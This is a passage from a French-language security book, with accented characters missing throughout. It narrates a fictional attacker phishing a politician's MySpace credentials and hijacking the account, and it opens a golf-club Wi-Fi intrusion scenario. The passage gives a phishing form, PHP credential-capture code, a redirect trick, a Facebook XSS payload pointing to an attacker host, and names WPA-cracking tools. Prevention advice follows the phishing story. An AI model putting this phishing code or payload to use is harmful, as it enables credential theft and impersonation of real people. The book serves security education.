Attaquer des rseaux sociaux

227

et quil se reconnecte. En se connectant au faux site MySpace, Phnix capturera lidentiant et le mot de passe de Wally. Phnix pourra ensuite rediriger Wally vers le vrai site MySpace, une vido YouTube, ou se contenter dafcher un message derreur "Page Non Trouve". La page MySpace de Phnix est illustre la Figure 7.1.

Figure 7.1
Fausse page MySpace de Phnix.

Puis Phnix modie le formulaire pour rcuprer le nom dutilisateur et le mot de passe de Wally. Le code correspondant est le suivant :
<h5 class="heading"> Connexion </h5> <form action="submit.php" method="post" name="theForm" id="theForm"> Mot de passe: <input type="text" name="username" /><br /> Password: <input type="text" name="password" /><br /> <input type="submit" value="submitForm"> </form>

228

Chanes dexploits

Avant de pouvoir rcuprer les saisies du formulaire, Phnix doit crer une base de donnes pour enregistrer les identiants. Heureusement, lhbergeur o Phnix enregistre sa fausse page MySpace autorise les bases de donnes. Il se connecte au serveur MySQL et saisit les commandes suivantes pour crer une base de donnes. La table contiendra deux champs, nomms name et pass, autorisant chacun 20 caractres.
mysql> CREATE DATABASE accounts mysql> CREATE TABLE credentials (name VARCHAR(20), pass VARCHAR(20));

Phnix cre ensuite un chier submit.php et crit du code pour ajouter lidentiant et le mot de passe dans la table credentials de la base accounts. Le code suivant fait abstraction de la gestion de la base de donnes.
<?php ... $user=serialize($_POST[username]); $pass=serialize($_POST[password]); $query="INSERT INTO accounts.credentials VALUES($user,$pass)"; ... ?>

Une fois les informations enregistres dans la base, Phnix peut rcuprer facilement les identiants et mots de passe.
Comprendre le code Cet ouvrage ne vise pas traiter exhaustivement dHTML, de PHP et de scripts, mais voici quelques explications quant au code saisi par Phnix. Le formulaire HTML capture lidentiant et le mot de passe de Wally et les enregistre dans des variables temporaires nommes username et password. Ces variables sont envoyes au script submit.php, qui en srialise les valeurs. La srialisation consiste transformer une valeur en une valeur qui peut tre stocke et, dans notre cas, enregistre dans une base de donnes. Le nom dutilisateur et le mot de passe sont srialiss dans les variables $user et $pass, qui sont ensuite insres dans la requte SQL. La requte SQL est ensuite envoye la base de donnes par le script (cette tape nest pas illustre ici).

Crer le site web de redirection Phnix pourrait se contenter denvoyer un commentaire Wally avec un lien vers sa fausse page MySpace, mais il sait que MySpace est de plus en plus malin en ce qui concerne le blocage des tentatives dhameonnage. Mme si cette attaque pourrait fonctionner une fois, Phnix sait que, plus grand est le nombre de gens cliquant sur

Chapitre 7

Attaquer des rseaux sociaux

229

www.myspace.com.ghtwzlmbqbpt.biz, plus grande est la probabilit que quelquun dtecte lattaque par hameonnage et la rapporte MySpace. Par ailleurs, chaque fois que vous cliquez sur un commentaire dun prol MySpace, vous ntes pas redirig directement. Vous passez par msplinks.com, un site de redirection servant trouver des publicits cibles pour les utilisateurs. Phnix sait que, sil place un lien direct vers son site dans un commentaire, msplinks.com enregistrera peut-tre le lien dans ses journaux et a mme peut-tre de quoi bloquer le site sil est rapport comme suspect. Plutt que denvoyer directement un lien dans son commentaire, Phnix dcide de passer par une tape supplmentaire et de crer une page sur un site populaire de blogs, blogger.com, illustr la Figure 7.2. Phnix ne va pas utiliser le site pour bloguer, mais pour rediriger le lien sur le MySpace de Wally vers la fausse page MySpace, qui demandera des identiants pour voir la vido.

Figure 7.2
Blogger.com.

230

Chanes dexploits

Phnix compte sur le scnario suivant :


m m

Wally lit un commentaire lui indiquant daller voir une vido sur YouTube. Wally clique sur la vido pour la voir, mais est redirig temporairement sur blogger.com. Blogger.com redirige immdiatement Wally vers la fausse page MySpace, o Wally essaie de se connecter avec son identiant et son mot de passe MySpace. Phnix enregistre les identiants de Wally.

Pour Phnix, ltape suivante consiste modier son blog pour que les utilisateurs soient redirigs automatiquement sur www.myspace.com.ghtwzlmbqbpt.biz. Il clique sur le lien Tableau de bord, puis sur le lien Mise en page. Il clique sur Modier le code HTML et saisit la ligne suivante dans la zone <head> de son blog :
<META HTTP-EQUIV="REFRESH" CONTENT="0; URL="http://www.myspace.com.ghtwzlmbqbpt.biz">

Lorsque Wally cliquera sur le lien YouTube, il sera redirig vers blogger.com, qui le redirigera vers la fausse page MySpace de Phnix. Le site dhameonnage et la page de redirection sont crs. Il est temps de crer un compte MySpace rel. Crer une page MySpace Phnix ouvre la page de cration de compte de MySpace et cre un nouveau compte. Il remplit la page de faon donner limpression de soutenir Wally Barkinotza au maximum. Il sassure de ne pas laisser dinformations permettant de lassocier son prol. Il utilise un faux nom, de fausses informations personnelles et utilise une adresse anonyme pour se connecter au site. Il rejoint les groupes MySpace associs la politique et donne comme activit "organisateur politique bnvole". Son nouveau site est illustr la Figure 7.3. Pour piger Wally, Phnix doit avoir des amis pour faire croire que son compte est actif sur MySpace. Normalement, vous explorez pour cela les listes de MySpace jusqu trouver des gens qui vous intressent et vous leur envoyez une demande de contact. Cest un processus long et, comme Phnix est press, il veut acclrer ce processus. Il existe diverses applications de gnration damis pour MySpace sur Internet. Pour se protger de ce type de gnrateurs, certains comptes MySpace utilisent des captcha, ncessitant quune personne saisisse les lettres dune image distordue. Il est possible, lorsquon rside aux tats-Unis, dliminer les captcha grce une validation du tlphone mobile.

Chapitre 7

Attaquer des rseaux sociaux

231

Figure 7.3
Page MySpace de Phnix.

Figure 7.4
Utilitaire Friend Blaster Pro.

232

Chanes dexploits

Avec Friend Blaster Pro, Phnix cherche sur MySpace dautres utilisateurs intresss par la politique en cliquant sur le lien de recherche et en cherchant des prols avec comme centre dintrt la politique (voir Figure 7.5).

Figure 7.5
Recherche MySpace.

Une fois la recherche effectue, Phnix clique sur le bouton Start pour extraire les identiants des comptes trouvs. Il envoie ensuite des demandes de contact grce longlet Friend Requester. Le lendemain, il trouve 40 amis sur sa page MySpace. "Ce nest pas trs lev, pense-t-il, mais cest sufsant pour faire croire Wally que mon compte MySpace est actif." Envoyer un commentaire Phnix a maintenant cr un compte MySpace, ajout des amis, cr un faux site MySpace et une page de blog redirigeant Wally vers le faux site MySpace. Phnix na plus qu amener Wally cliquer sur un lien pour aller sur le blog, ce qui redirigera son tour Wally sur la page MySpace.

Chapitre 7

Attaquer des rseaux sociaux

233

Le d consiste maintenant sassurer que Wally cliquera bien sur le lien. Envoyer un simple commentaire avec un lien ne garantit rien. Ce qui a le plus de chances de fonctionner est de faire en sorte que Wally clique sur ce qui semble tre une vido YouTube. Phnix va sur YouTube et fait une copie dcran dune vido (voir Figure 7.6).

Figure 7.6
Copie dcran dune vido YouTube.

Il sauvegarde la copie dcran comme une image et la met en ligne sur un site populaire dhbergement dimages, Photobucket (voir Figure 7.7).

Figure 7.7
Enregistrer une image sur Photobucket.

234

Chanes dexploits

Phnix visite maintenant la page MySpace de Wally et clique sur le lien de cration de commentaire. Il saisit le texte "Voici une vido musicale que jai faite pour illustrer votre campagne !" et clique sur le lien pour ajouter limage de Photobucket. Il slectionne limage de la vido YouTube. Il clique ensuite sur le bouton HTML pour faire pointer limage sur le lien de son blog :
<a href="http://phenixhacker.blogspot.com">

Son commentaire, illustr la Figure 7.8, est prt tre publi sur le MySpace de Wally.

Figure 7.8
Envoyer un commentaire.

Le commentaire safche sur la page de Wally. Il ressemble un lien vido vers YouTube. Les gens sont habitus voir des vidos YouTube sur MySpace et savent quil faut cliquer sur le bouton Play pour lancer la vido. Mais, lorsquil cliquera sur le lien, Wally sera envoy sur phenixhacker.blogspot.com qui, son tour, le redirigera vers le faux site MySpace lui demandant de se connecter pour afcher le contenu. Compromettre le compte Il suft maintenant dattendre. Selon le site de Wally, celui-ci se connecte personnellement MySpace pour lire les commentaires. Phnix est sr que publier un commentaire ressemblant une vido de soutien pour la campagne de Wally est une excellente mthode pour capturer lidentiant et le mot de passe de Wally.

Chapitre 7

Attaquer des rseaux sociaux

235

Phnix se connecte sa base de donnes MySQL contenant les identiants rcuprs et saisit les commandes suivantes :
mysql> USE accounts; mysql> SELECT * FROM credentials; +-++ | name | pass | + ++ | wally@barkinotza.com| vote4me! | | bigwallyfan@gmail.com| 351am#1b | | cbk@politicalfirst.com| password1| | jon@jonpainting.com| jon2008 | | traci@kconlinebiz.com| Ch@rl13 | |-++

Les rsultats vont au-del des esprances de Phnix. En 24 heures, il a rcupr les identiants de Wally et de quatre autres personnes qui ont vu le commentaire de Phnix et cliqu sur le lien. Se connecter au compte pirat Arm des informations de compte de Wally, Phnix retourne sur MySpace et se connecte avec ladresse wally@barkinotza.com et le mot de passe vote4me!. Il est connect ! La Figure 7.9 illustre Phnix connect sous le compte de Wally.

Figure 7.9
Phnix logu sous le compte de Wally.

236

Chanes dexploits

Phnix est connect en tant que Wally ; il peut maintenant envoyer un bulletin. Un bulletin, sur MySpace, permet denvoyer un message tous vos amis. Phnix espre dtruire la rputation de Wally en envoyant un message incitant tous ses soutiens le laisser tomber et, par consquent, rendre son lection trs improbable. Phnix clique sur le lien Publier un bulletin et saisit le message suivant :
Sujet : Prises de position Mes chers concitoyens, Aprs de nombreuses dlibrations, je crois devoir claircir ma position sur certains problmes actuels de notre pays. Je sais que vous avez le choix du candidat que vous allez lire et il me semble important que vous connaissiez la position de chaque candidat sur ces problmes importants. Voici mon avis sur certaines de ces questions cls. ducation. Je pense que lducation est importante mais quelle ne devrait pas tre finance par largent public. Il est temps de supprimer le systme duniversits publiques. Environnement. Les menaces envers lenvironnement sont largement exagres. Nous devrions nous intresser des problmes plus importants et laisser lenvironnement soccuper de lui-mme. Scurit sociale. Nous devrions abolir la scurit sociale. Largent qui contribue au financement de la scurit sociale ne devrait pas tre redistribu aux contribuables mais attribu un fonds gnral, utiliser la discrtion du gouvernement pour amliorer ce pays. Rforme du financement des campagnes. Nous devons modifier les rgles de financement des campagnes pour aider les grandes entreprises faire valoir leurs intrts grce de larges dons aux hommes politiques. Impts. Nous devrions augmenter les impts pour que les salaires des snateurs soient augments. Vu leur salaire courant, slevant seulement 160 300 $ par an, je pense que nous sommes tous daccord sur le fait quil est grand temps daugmenter les snateurs. Conscription obligatoire. Nous devrions rtablir le service militaire obligatoire pour les jeunes de plus de 16 ans. Nous devons nous prparer envahir de nouveaux pays si besoin, et nous avons besoin pour cela dune puissance militaire importante. Il va sans dire que ces questions ont un cho dans le cur de tous les citoyens. Montrez-moi votre soutien en envoyant votre contribution aujourdhui. Votez Wally ! Votre futur snateur, Wally Barkinotza.

Chapitre 7

Attaquer des rseaux sociaux

237

Phnix laisse chapper un sourire en cliquant sur le bouton Publier. Rsultats Le lendemain, les gros titres traitent de lindignation nationale vis--vis de Wally Barkinotza. Les gens narrivent pas croire que Wally ait ces opinions sur ces questions. Wally Barkinotza essaie de minimiser la raction du public et nie catgoriquement lenvoi du bulletin, mais le mal est fait. Il essaie, plusieurs reprises, dexpliquer que son compte MySpace a t pirat, mais cela ne fait quempirer la situation. Le public veut pouvoir faire conance ses dirigeants, et un politicien avec un site web pirat ninspire pas la conance. Les commentateurs politiques suggrent dj que Wally na pas dautre choix que dabandonner la course. Phnix est certain que Wally Barkinotza ne sera jamais lu au Snat.
Quen est-il de Facebook ? Facebook est un autre rseau social populaire affichant plus de 200 millions dutilisateurs. Facebook est galement vulnrable aux attaques. Une des attaques les plus populaires a quelque temps t un exploit dcouvert par Adrienne Felt de luniversit de Virginie (www.cs.virginia.edu/felt/fbook). Sa recherche concernait les attaques de type cross-site request forgery (CSRF) impliquant le langage de balisage de Facebook (FBML, Facebook Markup Language). Lexploit reposait sur une faille de la balise <fb:swf> utilise pour ajouter du contenu Flash dans une application Facebook sur le profil de quelquun. Le code correspondant tait le suivant :
<fb:swf swfsrc=http://myserver/flash.swf imgsrc=http://myserver/image.jpg imgstyle="-moz-binding:url(\http://myserver/xssmoz.xml#xss\);"/>

Une fois interprt, le code devient :


<img src=http://facebook/cached-image.jpg style="-moz-binding:url (http://myserver/xssmoz.xml#xss);"/>

En ajoutant ce code sa page, Phnix naurait eu qu inciter Wally visiter sa page. Une simple consultation aurait excut le JavaScript malfaisant, enregistr dans le fichier XML (xssmoz.xml, dans cet exemple). Le JavaScript se trouve dans le code XML :
<?xml version="1.0"?> <bindings xmlns=http://www.mozilla.org/xbl> <binding id="xss"><implementation><constructor> <![CDATA[ alert(XSS); ]]> </constructor></implementation></binding> </bindings>

238

Chanes dexploits

Ce code ne prsente quun simple message dalerte, mais pourrait faire bien plus que cela. Le code JavaScript aurait par exemple pu insrer un message sur le mur (identique un commentaire Facebook) de Phnix, provenant de Wally, au moment o Wally visualisait le profil de Phnix. Phnix aurait pu faire en sorte que Wally semble crire quelque chose doffensant pour le public sur son profil, puis faire la publicit de ce commentaire aux mdias. En aot 2007, Facebook a corrig la faille, de sorte que cet exploit ne fonctionne plus. Ce nest quune question de temps, cependant, avant quun autre exploit ne soit dcouvert.

Rsum de la chane dexploits Les rseaux sociaux sont souvent utiliss par les politiciens pour promouvoir leurs campagnes. Dans ce chapitre, Phnix a enchan des exploits impliquant plusieurs tapes de manipulation dun homme politique pour quil donne ses informations de connexion. Aprs avoir cr un faux site et amen Wally donner son nom dutilisateur et son mot de passe, Phnix a pu se connecter au prol de Wally et modier ses opinions politiques annonces. Plusieurs tapes ont t ncessaires, mais une fois accomplies, elles ont entran la chute de la carrire politique de Wally.

Mesures de prvention
Il ny a pas de dbat quant la popularit des rseaux sociaux tels que Facebook et MySpace. Ils enregistrent des centaines de milliers de nouveaux comptes quotidiennement et il existe donc forcment des gens qui veulent exploiter ces sites. Il peut sembler impossible de se protger contre les attaques de ce chapitre, mais il existe quelques garde-fous pour vous protger. En voici quelques-uns. vitez les rseaux sociaux Si vous voulez viter que votre compte MySpace ou Facebook ne soit pirat, vitez de les utiliser. Crer un prol sur ces sites vous expose aux attaques de ce chapitre, ainsi qu dautres attaques par ingnierie sociale. Il sagit certes dune mesure vidente, mais cest un moyen sr dviter dtre la victime dune attaque dun rseau social.

Chapitre 7

Attaquer des rseaux sociaux

239

Utilisez un prol priv Si vous devez tre sur un rseau social tel que MySpace, utilisez un prol priv. Choisissez vos paramtres de vie prive de sorte que vous approuviez qui peut afcher votre page. Cependant, avant davoir une entire conance dans la protection fournie par les prols privs, assurez-vous davoir lu lencadr suivant.
Un profil priv peut tre moins priv que prvu Il y a quelques annes, une astuce populaire sur Internet permettait de voir les photos de comptes privs MySpace. Lattaque initiale, qui ne fonctionne plus aujourdhui, tait de trouver lidentifiant du compte en allant sur la page que vous vouliez voir. Dans ladresse suivante, lidentifiant est donn en gras :
http://profile.myspace.com/index.cfm?fuseaction =user.viewprofile&friendid=374989324

Il suffit ensuite de saisir ladresse suivante et dajouter lidentifiant la fin :


http://collect.myspace.com/user/viewPicture.cfm?friendID=374989324

Au cours des dernires annes, cette attaque a connu plusieurs variations. Celle-ci ne fonctionne plus, mais le risque est toujours prsent quun attaquant cratif parvienne accder aux profils privs.

Soyez prudent en cliquant sur un lien Comme mentionn prcdemment dans ce chapitre, MySpace utilise msplinks.com pour crer des liens que vous publiez dans des commentaires. Cela sert collecter des donnes pour des campagnes de publicit cibles. msplinks encode des adresses de sorte quil est difcile de savoir o un lien mne exactement avant de cliquer dessus. Par exemple, dans lattaque de ce chapitre, un commentaire contient une image dune vido YouTube. Ladresse du lien est encode sous la forme http://www.msplinks.com/ MDFodHRwOi8vcGhvZW5peGhhY2tlci5ibG9nc3BvdC5jb20=. La majorit des gens naura aucune ide que ce lien pointe en fait vers le site de Phnix. Tout espoir nest pas perdu, vous pouvez connatre la destination du lien. msplinks.com utilise un encodage en base 64. Vous pouvez par exemple utiliser Base64 Decoder ladresse http://www.opinionatedgeek.com/dotnet/tools/Base64Decode/Default.aspx (ou sur de nombreux autres sites). Saisissez les donnes dans cet outil et cliquez sur Decode : ladresse relle du site est http://phoenixhacker.blogspot.com.

240

Chanes dexploits

Exigez un nom de famille ou une adresse de courrier lectronique pour les demandes de contact MySpace permet dviter des personnes alatoires dtre vos amis. Bien sr, si vous utilisez le site pour faire votre promotion, comme lhomme politique de notre exemple, vous voulez un maximum damis. Si ce nest pas le cas, vous devriez congurer MySpace pour exiger, lors de demandes de contacts, que les gens connaissent votre nom de famille ou votre adresse de courrier lectronique. Ne publiez pas trop dinformations MySpace permet de saisir votre date de naissance, votre nom complet, votre lieu de naissance, votre mtier, les coles o vous avez tudi, et bien dautres informations encore. Toutes ces informations peuvent tre utilises dans des attaques par ingnierie sociale votre encontre. Noubliez pas quune information qui est publie sur Internet y reste archive jamais. Si vous mettez trop dinformations sur MySpace, il y aura moyen de rcuprer ces informations (grce au cache de Google ou WayBack Machine sur www.archive.org). Faites attention lorsque vous saisissez vos informations de connexion Dans lexemple prcdent, Wally a t redirig vers une fausse page MySpace. Si Wally avait t inform, en termes de scurit informatique, il aurait vri ladresse dans le navigateur web et aurait vu que le site ntait pas MySpace. Faites trs attention lorsque vous saisissez votre nom dutilisateur et votre mot de passe. Utilisez un mot de passe fort Vous ne devriez pas utiliser de mot de passe facile deviner. Comme votre page MySpace contient de nombreuses informations vous concernant, nutilisez jamais de mot de passe facile deviner (comme le nom de votre enfant ou votre quipe sportive prfre). Assurez-vous aussi de ne pas utiliser le mme mot de passe pour MySpace que pour dautres services comme la banque en ligne ou votre compte de messagerie lectronique. Si quelquun pirate votre compte MySpace, il connat votre adresse lectronique. Si vous utilisez le mme mot de passe, lattaquant peut galement compromettre votre compte de messagerie lectronique.

Chapitre 7

Attaquer des rseaux sociaux

241

Modiez frquemment votre mot de passe Changez souvent de mot de passe. Ainsi si quelquun pirate votre compte, il ne pourra y accder que jusquau moment o vous changerez le mot de passe. Si, un quelconque moment, vous souponnez avoir t pirat, modiez votre mot de passe immdiatement. Utilisez des outils antihameonnage Il existe des outils antihameonnage qui permettent de vous notier si vous visitez un site suspect dhameonnage. Ces outils incluent Netcraft Toolbar (http://toolbar.netcraft.com) et Firefox 3.5 (http://www.mozilla.com/).

Conclusion
Il faut bien ladmettre, les rseaux sociaux vont seulement gagner en popularit. Jamais autant dinformations nont t publiques. Les sites comme MySpace et Facebook sont donc des cibles prioritaires dattaque. Si vous tes sur un rseau social (comme des millions de gens le sont), assurez-vous de mettre en uvre de bonnes pratiques de scurit : passez votre prol en priv, choisissez un mot de passe fort, modiez votre mot de passe frquemment et soyez attentif aux liens suspects. Ce sont des mesures simples pour vous aider assurer votre scurit sur Internet.

8
Panique au club de golf
Scnario
Cest une journe classique au club priv de Brighton Bay. Les serveuses veulent des heures supplmentaires, les golfeurs pro demandent un nouvel analyseur de swing, la comptabilit a besoin de laccord de Philippe pour une pile de factures et les membres du club rclament toujours "cet accs Internet sans-l" pour le pavillon. Philippe na pas dautre choix que daccepter cette requte. Philippe est le directeur du golf de Brighton Bay, un des clubs les plus populaires du sud-ouest de la Floride. Son intrieur et son dcor chics rappellent la Toscane. Le club ne recule devant aucune dpense pour ses membres. Hritiers ou nouveaux riches, les membres ont de largent et le dpensent ici : au golf, au tennis, pour divers divertissements, en signant des contrats ou en passant la journe au spa. Les membres du club y dpensent en moyenne 2 800 $ par mois, sans compter labonnement. Philippe est donc prt faire ce quil faut pour que ses membres soient satisfaits. Quant laccs Internet sans-l, Philippe ne sait pas trop comment mettre en place cela efcacement. Il cre donc un comit technique constitu de bnvoles de la communaut. Une confrence dun consultant en technologies de linformation est organise pour le comit de professionnels retraits et expriments (maintenant bnvoles) et Philippe, ainsi que le directeur nancier du club. "Mesdames et messieurs, merci de nous offrir cette opportunit de vous aider relever le d que pose la mise disposition dun accs sans-l aux membres de votre club dans ce pavillon principal." Le consultant continue en expliquant les bnces et risques de la scurit sans-l. On peut entre autres craindre des failles de scurit, des vols didentit et des abus de la

244

Chanes dexploits

part des employs. La moiti du comit ne comprend rien ce que raconte le consultant, et lautre moiti ny croit pas. Un homme regarde par la fentre, davantage intress par lidentit du golfeur qui parcourt ses 18 trous avec un driver Aurora, festonn et au prol elliptique. Le consultant continue avec une proposition pour un systme sans-l solide et scuris. Philippe commence voir des dollars apparatre dans ses yeux. Il propose des points daccs multiples pour une bonne couverture et parle de modier les ESSID. Un des membres du comit se penche vers un autre et demande : "Mais cest quoi, un ESSID ?" Tandis quils continuent discuter de la limitation des accs grce au WPA2 et linstallation dun quipement de VPN pour authentier les utilisateurs, interfac par un serveur RADIUS, et de fournir un accs Internet par ADSL, les questions et lennui du comit commencent perturber la prsentation. Un des membres du comit demande : "Pourquoi avons-nous besoin de tout a ? Nous avons tous un rseau sans-l chez nous et nous navons pas dvelopp de telles solutions extrmes. Cest une excellente question, rpond le consultant. Permettez-moi dy rpondre par dautres questions. Acceptez-vous les cartes de crdit ici ? Avez-vous des informations personnelles enregistres dans la base de donnes de votre club ? Y conservez-vous ladresse de vos membres ? Bien sr, rpond le membre du comit, presque insult. Cest bien pour cela que vous avez besoin dautant de protections, rpond le consultant calmement. Vous devez protger les membres de votre club contre les pirates professionnels et novices, les script kiddies et les simple dlinquants qui veulent, pour une raison ou une autre, acqurir ou dtruire ces informations." Selon les statistiques du Javelin Strategy Survey, 8,4 millions dAmricains ont t victimes de vol didentit en 2007. Aprs discussion, Philippe remercie le consultant pour son temps et sa proposition et ajourne la runion. la n de la runion, Philippe prend conscience que la mise en place de ce rseau sansl scuris va demander une somme assez importante. Cependant, vu le budget annuel de Brighton Bay, le cot total est nalement faible pour protger les membres et leurs donnes comptables. Il discute avec son directeur nancier et les membres du comit de ce quils ont appris. Un membre prend la parole et explique quun des employs du magasin de matriel est trs dou avec les ordinateurs : il a aid une personne du comit rsoudre un problme de mise en forme de tableur le mois prcdent. Le membre suggre que le club pourrait proposer un bonus lemploy en change de la mise en

Chapitre 8

Panique au club de golf

245

place du rseau sans-l. lencontre de son propre jugement, en tant que mesure durgence pour contenter les membres, Philippe autorise le directeur du comit faire appel lemploy du magasin. Celui-ci achte quelques points daccs Wi-Fi, les installe dans le pavillon et active WPA avec lESSID AP1 et la passphrase brighton. Les membres du comit technique sont satisfaits deux-mmes : ils ont russi mettre disposition des membres du club un accs sans-l Internet pour une fraction du cot prsent par le consultant quelques jours auparavant. Pourquoi auraient-ils besoin de telles mesures, de toute faon ? Et laccs sans-l est tellement simple que mme les utilisateurs les moins verss techniquement peuvent consulter et envoyer des courriers lectroniques et les photos de leurs petits-enfants, payer leurs factures et naviguer sur des sites quils noseraient pas ouvrir chez eux. Pendant ce temps, 150 kilomtres de l lest, le long de lAlligator Alley 1, Phnix se rveille aprs une longue nuit de fte sur la South Beach. Il est 11 h 30 quand lalarme de son rveil se dclenche. Il sort de son lit dans sa maison de 300 m 2 au bord du canal, prend une douche rapide, enle une chemise hawaenne et des tongs, attrape ses clubs de golf Ping et un sac dordinateur us, grimpe dans sa dcapotable BMW 650i lustre et part vers louest le long de lAlligator Alley. Il est en route pour sa journe de travail. Phnix se dirige vers lest car il sait quil y a une source innie de revenus, appele clubs privs, dans cette partie de la Floride. Et comme la dit Willie Sutton alors quon lui demandait pourquoi il braquait des banques : "Parce que cest l que se trouve largent." Phnix ne fait rien de diffrent apparemment. Depuis quil a quitt son emploi de bureau et quil se consacre au piratage dordinateurs, Phnix sest cr un style de vie intressant. Il devrait y avoir un nom plus respectable pour le mtier quil exerce. Il vend principalement du temps sur le botnet quil a cr ; celui-ci compte environ 150 000 zombis dans le monde entier. Ce nombre change tous les jours : des ordinateurs en sont retirs et dautres sont contamins par son virus sur divers sites web ou via des spams. Il naurait jamais pens, cinq ans plus tt, en recevant sa matrise de nance, quil gagnerait sa vie de cette manire, mais il sest accommod ce style de vie. Et, pour tre franc, il aime son travail : il est rare de se faire prendre, a paye bien et cest assez peu risqu. De plus, rien ne peut battre latmosphre de son lieu de travail. Il a vue sur les meilleurs terrains de golf du pays, le vent soufe dans les palmiers, le toit de sa dcapotable est abaiss, il sirote des sodas et fait son travail quotidien ou son attaque quotidienne.
1. N.D.T. : Il sagit dune route reliant la cte ouest et la cte est de la Floride.

246

Chanes dexploits

Lattaque planie aujourdhui est un peu dlicate, mais avec son expertise et le fait quil a t contact par une personne anonyme avec un accent tranger dispose payer une somme coquette pour des informations personnelles sur de riches individus, il est prt la mener. Aprs quelques kilomtres, Phnix approche lentre prestigieuse du club de golf Royal Isle et saperoit que les gardiens lentre sont trs consciencieux. Ils lui interdisent laccs car son nom nest pas sur la liste, et il navait pas afft ses comptences dingnierie sociale. Ce nest pas un problme. Avec sa casquette de golf et ses clubs sur le sige arrire, il roule jusquau club suivant, sa voiture toujours dcapote. "Bienvenue au Club et Golf de Brighton Bay", dit le panneau. Il sourit au gardien et lui dit quil est en retard pour une partie prvue avec son chef le gardien est alors tout dispos lui indiquer le pavillon. Il a maintenant besoin dune place de parking aux alentours du pavillon pendant environ 20 minutes, et les membres du club ne sauront jamais ce qui leur est arriv. Il va essayer daccder au rseau via les points daccs sans-l du club. Lorsquil aura accs au rseau, il regardera ce quil a autour de lui et rcuprera les bases de donnes du rseau. Lorsquil aura les bases de donnes, il pourra sortir du club, acheter un sandwich au poisson et une margarita au bar le plus proche, passer un autre club et rentrer chez lui pour voir ce quil aura rcupr et comment continuer son attaque. Personne ne fait attention la voiture 85 000 $ de Phnix car elle est parfaitement sa place au milieu de toutes les autres voitures 85 000 $. Il sort son portable, lallume et la fentre de connexion de Microsoft Windows XP safche. Il se connecte et attend que sa carte Wi-Fi Cisco Aironet 802.11 a/b/g dtecte les rseaux de la zone. La bote de dialogue souvre, mais na rien dtect. Il peut maintenant commencer travailler en essayant dutiliser NetStumbler (www.netstumbler.com) ou dmarrer Linux et lancer Kismet (www.kismetwireless.net). Ce sont deux outils servant sniffer les rseaux Wi-Fi.

Approche
Comme pour les attaques des autres chapitres, il existe plus dune mthode pour effectuer lattaque de Phnix. Il a besoin daccder au rseau : le plus simple est de craquer les points daccs sans-l et de rcuprer les donnes via le rseau Wi-Fi.

Chapitre 8

Panique au club de golf

247

Craquer le WPA2 grce coWPAtty Tout le crdit revient Joshua Wright et son outil nomm coWPAtty. Sans cet outil, il serait bien plus difficile de craquer du WPA. Mais ce nest quun des outils utiliss par Phnix pour cette attaque. Selon Joshua Wright, "coWPAtty est conu pour auditer la slection de cl prpartage (PSK, pre-shared key) pour les rseaux WPA bass sur le protocole TKIP (Temporal Key Integrity Protocol)".

Voici le rsum des tapes suivies par Phnix : 1. pirater un point daccs sans-l pour accder au rseau sans-l du club ; 2. craquer lauthentication Kerberos pour obtenir des mots de passe ; 3. craquer des mots de passe avec des Rainbow Tables ; 4. utiliser des accs administratifs donns par les mots de passe craqus pour voler les donnes du club.

Pour plus dinformations


Mme si Phnix ne les utilisera pas tous dans cet exploit, il peut choisir plusieurs outils pour sniffer le rseau Wi-Fi. En voici une liste non exhaustive. Il peut exister des versions plus rcentes, voire de nouvelles applications, mais en voici quelques-uns :
m

Kismet http://www.kismetwireless.net. Kismet est un dtecteur, sniffeur et systme de dtection dintrusion de couche 2 802.11. Il fonctionne avec toute carte sans-l qui prend en charge le monitor (rfmon) et peut sniffer le trac 802.11b, 802.11a et 802.11g. Son auteur est Mike Kershaw. Aircrack-ng http://www.aircrack-ng.org/. Aircrack-ng est un programme pour craquer les cls 802.11 WEP et WPA-PSK qui peut rcuprer les cls une fois que sufsamment de paquets ont t capturs. Son auteur est Thomas dOtreppe. WaveStumbler http://www.cqure.net/wp/wavestumbler/. WaveStumbler est un mapper rseau 802.11 en mode console pour Linux. Il renvoie des informations de base sur les points daccs : canal, WEP, ESSID, MAC, etc. Il prend en charge les cartes Hermes (Compaq, Lucent/Agere, etc.). Il est toujours en cours de dveloppement, mais tend la stabilit. Son auteur est Patrik Karlsson. Wellenreiter http://wellenreiter.sourceforge.net. Wellenreiter est un outil daudit et de dcouverte de rseaux sans-l. Il peut dcouvrir des rseaux (en mode

248

Chanes dexploits

ad-hoc ou infrastructure) et dtecter les ESSID des rseaux, quils soient diffuss ou non, ainsi que leurs capacits WEP et leur fabricant. Les protocoles DHCP et ARP sont dcods et afchs pour vous prsenter des informations supplmentaires quant au rseau. Un chier compatible Wireshark/tcpdump est cr, ainsi quun chier de sauvegarde de lapplication. Avec un priphrique GPS pris en charge et le dmon gpsd, vous pouvez dterminer la position des rseaux dcouverts. Ses auteurs sont Michael Lauer, Max Moser, Steffen Kewitz et Martin J. Muench.
m

KisMAC-ng http://kismac-ng.org. KisMAC est une application libre de dcouverte de rseau pour Mac OS X. MacStumbler http://www.macstumbler.com. MacStumbler est un outil pour afcher des informations sur les points daccs sans-l locaux. MacStumbler peut tre utilis pour le war driving, technique consistant circuler en voiture dans une zone avec un GPS pour crer une carte des points daccs de la zone. iStumbler http://www.istumbler.net. iStumbler est un outil de dcouverte de rseau sans-l pour Mac OS X. NetStumbler http://stumbler.net/. NetStumbler est un utilitaire Windows daudit de rseaux sans-l 802.11b.

Vous trouverez une liste plus importante de sniffeurs et outils de dcouvertes rseau ladresse www.packetstormsecurity.org/sniffers.
Attaques relles de clubs privs La descente des services de limmigration au club de Little Rock a t largement dcrite dans les mdias comme une affaire de vol didentit, ce quelle tait, intrinsquement. Mais les personnes arrtes navaient pas vol de cartes de crdit ou assimils. Elles utilisaient les numros de scurit sociale dautres personnes pour dcrocher des emplois leur permettant de nourrir leur famille. En mars 2008, un golf du sud-ouest de la Floride a t exploit via un keylogger distribu dans le courrier lectronique dun pirate se faisant passer pour une notification du Better Business Bureau1. Les pirates ont pu extraire plus de 39 000 $ de diffrents comptes avant dtre reprs.

1. N.D.T. : Le BBB ou Better Business Bureau est un groupement dassociations locales aux tats-Unis visant promouvoir un march juste et efcace. Ils publient des rapports dinformation sur les bonnes pratiques des entreprises, jouent un rle de lanceurs dalertes vis--vis des fraudes pour les entreprises et les consommateurs et sont mdiateurs entre les consommateurs et les entreprises. Lquivalent franais le plus proche serait probablement lUFC-Que Choisir.

Chapitre 8

Panique au club de golf

249

